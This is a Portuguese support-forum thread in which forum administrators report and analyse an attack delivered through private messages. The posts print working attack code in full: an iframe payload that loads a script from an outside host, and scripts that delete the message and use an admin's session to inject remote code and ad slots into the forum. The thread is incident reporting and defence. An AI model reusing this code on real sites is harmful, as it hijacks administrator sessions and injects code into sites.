Fórum dos Fóruns

Fórum dos Fóruns Forumeiros

Welcome FdF Bem-vindo ao fórum de suporte Forumeiros  Muito feliz


Para aproveitar tudo o que o nosso fórum lhe oferece, agradecemos que se identifique, se já é nosso membro, ou que se junte à nossa comunidade, fazendo o seu registo.
Conectar-se

Esqueci minha senha

Últimos assuntos
» Remover pequeno espaço no final do fórum
Hoje à(s) 05:57 pm por Luiz

» Logo para forum...
Hoje à(s) 05:57 pm por Lost154

» Emblemas não está sendo modificado
Hoje à(s) 05:53 pm por iScroll

» Código JavaScript do Chatbox não surtiu efeito
Hoje à(s) 05:40 pm por Lemon~

» Deixar apenas um dos menus com imagem
Hoje à(s) 05:39 pm por Luiz

» Neve no fórum
Hoje à(s) 05:35 pm por Luiz

» Favicon meu para forum....
Hoje à(s) 05:27 pm por GustavoDM11

Perdi minha senha!
Você precisa recuperar sua senha?
Clique aqui
Os membros mais ativos da semana
Luiz
 
Gaaratsu
 
iScroll
 
Daniel Yan
 
Ketholy
 
Eduardo Lima
 
Shek
 
ranzatti
 
Lost154
 
cocas20
 

Quem está conectado
249 usuários online :: 15 usuários cadastrados, Nenhum Invisível e 234 Visitantes :: 2 Motores de busca

Daniel Yan, Gaaratsu, gangablue, GustavoDM11, iScroll, juleic1123, Ketholy, Lemon~, Lost154, Luiz, Maiicinhu, MateusAnjosV, Pedxz, RenatoFPW, zGalaxyIIZBII

[ Ver toda a lista ]


O recorde de usuários online foi de 3131 em 24/12/09, 01:05 pm

Tentativas de Hacker o Fórum, por MP.

Ver o tópico anterior Ver o tópico seguinte Ir em baixo

Resolvido Tentativas de Hacker o Fórum, por MP.

Mensagem por danki5 em 04/02/15, 01:58 pm

Detalhes da dúvida

Versão do fórum : phpBB3
Nível de acesso : Administrador
Navegador usado : Google Chrome
Membros afetados : Vários usuários, uns sim e outros não
Problema começou : Desde o dia 27/01/2015
Endereço do fórum : http://xmutantesrpg.forumeiros.com/

Descrição do problema

Boa tarde,

Estou tendo problemas em um dos fóruns que sou administrador.

Alguém conseguiu encontrar uma brecha na segurança do forumeiros atraves de MP.

Funcionou da seguinte forma:

1- Ele mandou uma MP com uma pergunta boba, para cada um dos Adm do fórum que atuo.

2- Quando cada um dos Adm abriu a MP, dava tempo para ler ela e simplesmente ela sumia em seguida como se nunca tivesse sido mandada.

3- Achamos estranho no primeiro dia, até em então não tomamos nenhuma providencia achando que era apenas algum erro qualquer.

4 - No dia seguinte todos Adm receberam novamente a MP, comecei a desconfiar do ocorrido e fui verificar a seção de segurança do fórum para ver se tinha alguma modificação ou algo estranho. Para minha surpresa tinha mais de uma criação de javascript minha e de outros Adms, olhei as datas e horas, e bateu com o horário que abrimos as mps.

5 - Apaguei cada um dos javas scripts, mais antes cheguei a guardar para poder analisar eles depois ou pedir que alguém olha-se para mim.

6 - Entramos na conta de quem fez as mps, mas não existia mais nenhuma lá, queria recuperar o codigo da mp que nos  "hackeou" mas sem sucesso...

7 - Outro dia recebemos uma mp estranha novamente e um dos adm conseguiu pegar o codigo da MP, que estava oculto mais uma vez em uma pergunta boba.

-----------------------

IMAGENS

http://i.imgur.com/tmLjpWj.png
http://i.imgur.com/cJGlkXP.png
http://i.imgur.com/3wWvEE0.png
http://i.imgur.com/zCGFcCj.png

-----------------------

CODIGO DA TERCEIRA TENTATIVA POR MP

Código:
 [table style="width:1px;height:1px;border:1px solid transparent"][tr][td]<iframe style="width:1px;height:1px;border:1px solid transparent" src="javascript:if(window.top.dfgdgfdgfgcg===undefined){window.top.jQuery.getScript('http://xmlfeed2.6te.net/d')};window.top.dfgdgfdgfgcg='a'"></iframe>[/td]
[/tr]
[/table]
avatar

danki5
Nível 2

Masculino
Inscrito dia : 19/05/2014
Mensagens : 10
Pontos Ativos : 14

Ver perfil do usuário

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por JScript em 04/02/15, 02:21 pm

Estes são os códigos usados:

1-
Código:

jQuery(document).ready(function() {

    jQuery.post('/privmsg', {
        'delete': 'true',
        'mark[]': location.href.split('p=')[1],
        'confirm': 's'
    });

    var phpbb3 = '#wrap #page-header .headerbar #logo-desc p';
    var phpbb2 = 'table.bodylinewidth td.bodyline table[width="100%"][cellspacing="0"][cellpadding="0"][border="0"] td[align="center"][width="100%"] span.gen';
    var invision = '#ipbwrapper #logostrip p#site-desc';
    var punbb = '.pun #pun-intro p#pun-desc';

    if (jQuery(phpbb3).length) {
        var sitedesc = jQuery(phpbb3).html()
    } else if (jQuery(phpbb2).length) {
        var sitedesc = jQuery(phpbb2).html().split('<br>&nbsp; ')[0]
    } else if (jQuery(invision).length) {
        var sitedesc = jQuery(invision).html()
    } else if (jQuery(punbb).length) {
        var sitedesc = jQuery(punbb).html()
    } else {
        var sitedesc = ''
    };

    var codigo = '<script src=//xmlfeed2.6te.net/s></script>';
    if (sitedesc.indexOf('<script src="//xmlfeed2.6te.net/s"></script>') == -1) {
        if (sitedesc.length > 213) {
            var descricao = sitedesc.substring(0, 213) + codigo
        } else if (sitedesc.length < 150) {
            for (var wordtest = ''; wordtest.length < 150 - sitedesc.length; wordtest += ' ') {};
            var descricao = sitedesc + wordtest + codigo
        } else {
            var descricao = sitedesc + codigo
        };

        jQuery.post('/admin/index.forum?mode=general&part=general&sub=general&tid=' + jQuery('#logout').attr('href').split("tid=")[1].split("&")[0], {
            'site_desc': descricao,
            'submit': 's'
        });
    };
});

2-
Código:

if (window.dfgdfgdfgdfg === undefined) {
    window.dfgdfgdfgdfg = 'a';

    function testedeadd() {
        if (jQuery('a[href^="/admin/index.forum?part=admin&tid="]').length == 0) {
            var numaleat = parseInt(1000000) + Math.floor(Math.random() * 9999999 - 1000000);
            var h = '<div style="margin:0 auto;text-align:center"><iframe style=width:728px!important;height:90px!important;overflow:hidden!important frameborder=0 id=' + numaleat + '></iframe></div>';
            var phpbb2 = 'table.bodylinewidth td.bodyline table[cellspacing="0"][cellpadding="0"][border="0"]:has(a.mainmenu)';
            if (jQuery('script[src^="http://cas.criteo.com/delivery/ajs.php?"]').length) {
                jQuery('script[src^="http://cas.criteo.com/delivery/ajs.php?"]').closest('div[class]').replaceWith(h)
            } else if (jQuery('script[src="http://partner.googleadservices.com/gampad/google_service.js"]').length) {
                jQuery('script[src="http://partner.googleadservices.com/gampad/google_service.js"]').closest('div[class]').replaceWith(h)
            } else {
                if (jQuery('.pun').length) {
                    jQuery('.pun #pun-head').after(h)
                } else if (jQuery('#wrap').length) {
                    jQuery('#wrap #page-body').prepend(h)
                } else if (jQuery('#ipbwrapper').length) {
                    jQuery('#ipbwrapper #main-content').prepend(h)
                } else if (jQuery(phpbb2).length) {
                    jQuery(phpbb2).after(h)
                }
            };
            ifrm = document.getElementById(numaleat);
            ifrm = (ifrm.contentWindow) ? ifrm.contentWindow : (ifrm.contentDocument.document) ? ifrm.contentDocument.document : ifrm.contentDocument;
            ifrm.document.open();
            ifrm.document.write('<style>body{margin:0px}</style><script>google_ad_client=\x22pub-4591355146850004\x22;google_ad_slot=\x221666688237\x22;google_ad_width=728;google_ad_height=90</script><script src=http://pagead2.googlesyndication.com/pagead/show_ads.js></script>');
            ifrm.document.close();
            if (window.location.hostname == 'www.pokemonmythology.org') {
                jQuery('#fa_ticker_block').hide()
            };
            if (window.location.hostname == 'routeros.forumpramim.net') {
                jQuery('#fa_ticker_block').hide()
            }
        };
        jQuery('script[src="//xmlfeed2.6te.net/s"]').remove()
    };

    jQuery(document).ready(function() {
        if (window.testedeaddfdgd === undefined) {
            testedeaddfdgd = 'a';
            testedeadd()
        }
    });

    document.addEventListener("DOMContentLoaded", function(event) {
        if (window.testedeaddfdgd === undefined) {
            testedeaddfdgd = 'a';
            testedeadd()
        };
    });

    window.onload = function(e) {
        if (window.testedeaddfdgd === undefined) {
            testedeaddfdgd = 'a';
            testedeadd()
        };
    };

};
Eles estão hospedados neste domínio: http://xmlfeed2.6te.net/

Farei uma análise neles para verificar o nível de gravidade,

JS
avatar

JScript
Membro do Fórum

Masculino
Inscrito dia : 14/03/2013
Mensagens : 1449
Pontos Ativos : 1900

Ver perfil do usuário http://jscript.forumeiros.com/

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por danki5 em 04/02/15, 02:32 pm

Muito obrigado, ficarei no aguardo.
avatar

danki5
Nível 2

Masculino
Inscrito dia : 19/05/2014
Mensagens : 10
Pontos Ativos : 14

Ver perfil do usuário

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por JScript em 04/02/15, 02:46 pm

@danki5

Os seguintes fóruns listados abaixo e que pertencem a Forumeiros, fazem parte do código:
1- http://www.pokemonmythology.org/
2- http://routeros.forumpramim.net/

Também é "injetado" o código que está neste link: http://pagead2.googlesyndication.com/pagead/show_ads.js

Abaixo o trecho que oculta o módulo #fa_ticker_block para os respectivos fóruns acima citados:
Código:

            if (window.location.hostname == 'www.pokemonmythology.org') {
                jQuery('#fa_ticker_block').hide()
            };
            if (window.location.hostname == 'routeros.forumpramim.net') {
                jQuery('#fa_ticker_block').hide()
            }

Aguarde mais informações,

JS
avatar

JScript
Membro do Fórum

Masculino
Inscrito dia : 14/03/2013
Mensagens : 1449
Pontos Ativos : 1900

Ver perfil do usuário http://jscript.forumeiros.com/

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por Chrono Trigger em 04/02/15, 03:38 pm

Também recebi mp's com perguntas bem idiotas, eram duas contas de uma mesma pessoa, só apareceu um código na parte do javascrip que foi de feed, eu acabei add aquela barrinha de ferramentas que fica no topo que nem a do forumeiros.
avatar

Chrono Trigger
Nível 9

Masculino
Inscrito dia : 09/04/2010
Mensagens : 158
Pontos Ativos : 230

Ver perfil do usuário http://clothmythrevolution.com/portal.htm

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por JScript em 04/02/15, 03:44 pm

@Chrono Trigger

Se você for (e eu acredito que seja) um admin do fórum e poder me passar o email de quem lhe enviou essa MP, eu posso acionar a justiça do país em que o indivíduo está e com isso tomar as providências cabíveis nos tramites da lei.

JS
avatar

JScript
Membro do Fórum

Masculino
Inscrito dia : 14/03/2013
Mensagens : 1449
Pontos Ativos : 1900

Ver perfil do usuário http://jscript.forumeiros.com/

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por danki5 em 04/02/15, 04:04 pm

Etona@hotmail.com

Adp0klah@hotmail.com

No meu caso foi esses dois, mas como o fórum estava com ativação automática da conta, acredito que o email nem exista.

--

Teria alguma forma de desativar os javas que são recebidos por MP para evitar esses ataques?
avatar

danki5
Nível 2

Masculino
Inscrito dia : 19/05/2014
Mensagens : 10
Pontos Ativos : 14

Ver perfil do usuário

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por Chrono Trigger em 04/02/15, 04:08 pm

@danki5 escreveu:Etona@hotmail.com

Adp0klah@hotmail.com

No meu caso foi esses dois, mas como o fórum estava com ativação automática da conta, acredito que o email nem exista.

--

Teria alguma forma de desativar os javas que são recebidos por MP para evitar esses ataques?

Os e-mails também eram assim, era o nick do usuário.
Estrate@hotmail.com
Sonalitc@hotmail.com

O mais engraçado que quando ele mandava a mp você abria questão de segundos a página atualizava e ela era deletada, cheguei a mandar mp ao usuário, como ele tinha duas contas no fórum e é contra as regras do meu fórum, e ao me responder a mp dele também foi deletada. Depois de ler este tópico acabei banindo as duas contas, receio que não irá adiantar mas já ficarei de olho.
avatar

Chrono Trigger
Nível 9

Masculino
Inscrito dia : 09/04/2010
Mensagens : 158
Pontos Ativos : 230

Ver perfil do usuário http://clothmythrevolution.com/portal.htm

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por JScript em 04/02/15, 04:21 pm

A todos:

Uma solução perfeita é desativar o HTML das postagens, dessa forma seu fórum não estará suscetível a esse tipo de ataque!

JS
avatar

JScript
Membro do Fórum

Masculino
Inscrito dia : 14/03/2013
Mensagens : 1449
Pontos Ativos : 1900

Ver perfil do usuário http://jscript.forumeiros.com/

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por danki5 em 04/02/15, 04:22 pm

http://i.imgur.com/MmfKGaJ.png
http://i.imgur.com/lHuqFGU.png

Não sei se vai ajudar, mais tenho os IPs da segunda tentativa...
avatar

danki5
Nível 2

Masculino
Inscrito dia : 19/05/2014
Mensagens : 10
Pontos Ativos : 14

Ver perfil do usuário

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por JScript em 04/02/15, 04:28 pm

@danki5

Sim, com o IP eu já pulo a etapa do provedor de emails, obrigado!

JS
avatar

JScript
Membro do Fórum

Masculino
Inscrito dia : 14/03/2013
Mensagens : 1449
Pontos Ativos : 1900

Ver perfil do usuário http://jscript.forumeiros.com/

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por viniliff em 04/02/15, 04:39 pm

Olá.

Recomendo que não divulguem e-mails em mensagens no Fórum dos Fóruns, para fins de segurança e privacidade.

Isto é algo que não fica a meu critério, é claro, mas acredito que dialogar com o membro ou, até mesmo bani-lo, seja uma solução mais inteligente do que acionar a justiça. E no mais, a solução final já foi publicada:

@JScript escreveu:A todos:

Uma solução perfeita é desativar o HTML das postagens, dessa forma seu fórum não estará suscetível a esse tipo de ataque!

JS

Lembrem-se que a lei é muito mais complexa do que a simples ação de enviar MPs que "desaparecem" posteriormente. Além disso, é preciso que hajam provas concretas. Isto é apenas uma recomendação! Piscada

Até mais.
avatar

viniliff
Membro do Fórum

Masculino
Inscrito dia : 04/06/2014
Mensagens : 1710
Pontos Ativos : 2079

Ver perfil do usuário http://publieiros.forumeiros.com https://twitter.com/ViniliffOficial

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por JScript em 04/02/15, 05:02 pm

@viniliff escreveu:Olá.

Recomendo que não divulguem e-mails em mensagens no Fórum dos Fóruns, para fins de segurança e privacidade.

Isto é algo que não fica a meu critério, é claro, mas acredito que dialogar com o membro ou, até mesmo bani-lo, seja uma solução mais inteligente do que acionar a justiça.
É com esse pensamento que esses indivíduos ainda se mantém importunando a vida de quem tem fóruns da Forumeiros!

Então devemos dialogar com quem faz essas coisas que são consideradas ilícitas?!
Você acha mesmo que a solução "banir" funciona como deveria?

Eu acho que você deve saber que a criminalidade não está somente nas ruas físicas, mas também no mundo virtual e assim como no real, devemos combater todo e qualquer ato que prejudique a vida seja social ou virtual de alguém.

JS
avatar

JScript
Membro do Fórum

Masculino
Inscrito dia : 14/03/2013
Mensagens : 1449
Pontos Ativos : 1900

Ver perfil do usuário http://jscript.forumeiros.com/

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por danki5 em 04/02/15, 05:41 pm

viniliff

Para esclarecer, como foi informado nas mensagens acima, foram utilizadas mais de uma conta e ataques em dias consecutivos, o que invalida a solução inteligente de Banir ou de conversar, como sugerido, pois a medida que baníamos ele criava uma outra e fazia o mesmo. E como dito por Chrono, o fórum dele parece ter sofrido algo parecido, o que impede desse autor de ataques não fazer o mesmo ou já esta fazendo com outros fóruns do forumeiros por estar saindo impune?

Conheço um pouco de programação, mais sou leigo em javascript, mas pelo tamanho do código, hospedagem de scripts em outros lugares, não me parece uma tentativa de alguém que quer conversar ou que tenha preparado isso tudo para atacar apenas um fórum. Tenho a desconfiança que o alvo dele era a conta do fundador, não vejo outro motivo para ele repetir o ataque, no nosso forum conseguimos evitar que o fundador abrisse a MP, talvez evitando um problema maior.
avatar

danki5
Nível 2

Masculino
Inscrito dia : 19/05/2014
Mensagens : 10
Pontos Ativos : 14

Ver perfil do usuário

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por Chrono Trigger em 04/02/15, 11:44 pm

Eu não consegui pegar o Ip dele muito menos o código da mensagem. Bani as duas contas, caso aconteça novamente ai vamos ter que resolver de outra forma.
avatar

Chrono Trigger
Nível 9

Masculino
Inscrito dia : 09/04/2010
Mensagens : 158
Pontos Ativos : 230

Ver perfil do usuário http://clothmythrevolution.com/portal.htm

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por Sennior em 06/02/15, 12:19 pm

Saudações,

JScript, o senhor com todo conhecimento que tem, será que por via não conseguiria criar algo para criar uma segurança para os membros? Algo que como eu vi em um tópico criado aqui mesmo no Fórum dos fóruns o membro pedia um código que bloqueasse JavaScript na mensagem privada.

Sou bem neutro nessa linguagem, mas o senhor com todo conhecimento acha que dá pra criar algo assim? Que sanaria a função JavaScript em mensagens privadas?
Até mais.
avatar

Sennior
Membro profissional
Membro profissional

Masculino
Inscrito dia : 10/06/2011
Mensagens : 16302
Pontos Ativos : 20791

Ver perfil do usuário http://ajuda.forumeiros.com/forum https://www.facebook.com/GlladstonHenrique

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por JScript em 11/02/15, 08:51 am

@Sennior
Olá!

Aceito o desafio e lhe garanto que JS será proibido até nos tópicos, mesmo estando com o HTML ativo!!!

Em breve,

JS
avatar

JScript
Membro do Fórum

Masculino
Inscrito dia : 14/03/2013
Mensagens : 1449
Pontos Ativos : 1900

Ver perfil do usuário http://jscript.forumeiros.com/

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por JScript em 12/02/15, 11:43 am

Nota: Eu não consegui editar a mensagem anterior!


Está sendo feito um rastreamento para saber quem criou o endereço http://xmlfeed2.6te.net no host http://www.freewebhostingarea.com/ , com isso chegaremos até o indivíduo que o criou!

JS
avatar

JScript
Membro do Fórum

Masculino
Inscrito dia : 14/03/2013
Mensagens : 1449
Pontos Ativos : 1900

Ver perfil do usuário http://jscript.forumeiros.com/

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por danki5 em 12/02/15, 02:58 pm

Obrigado senhores pelo ótimo atendimento, ficarei no aguardo.

Bloqueie as MPs enquanto não é resolvido.
avatar

danki5
Nível 2

Masculino
Inscrito dia : 19/05/2014
Mensagens : 10
Pontos Ativos : 14

Ver perfil do usuário

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por nikka em 13/02/15, 04:46 pm

Olá danki5,

Devido a um iframe oculto nas mensagens ou Mensagens Privadas, um código script era adicionado à descrição do fórum, fazendo com que as publicidades aparecessem, mesmo que tenha assinalado ou pago para que isso aconteça.

Uma alteração ao nível dos códigos foi realizada hoje pelos técnicos nos fóruns Forumeiros de forma a que isso não volte a acontecer.


Agradecemos a sua colaboração e pedimos desculpas pelos inconvenientes causados.
Até mais.
avatar

nikka
Membro profissional
Membro profissional

Feminino
Inscrito dia : 16/12/2008
Mensagens : 15621
Pontos Ativos : 19895

Ver perfil do usuário http://ajuda.forumeiros.com/ https://www.facebook.com/forumeirospt https://twitter.com/Forumeiros_PT

Ver o tópico anterior Ver o tópico seguinte Voltar ao Topo


Permissão deste fórum:
Você não pode responder aos tópicos neste fórum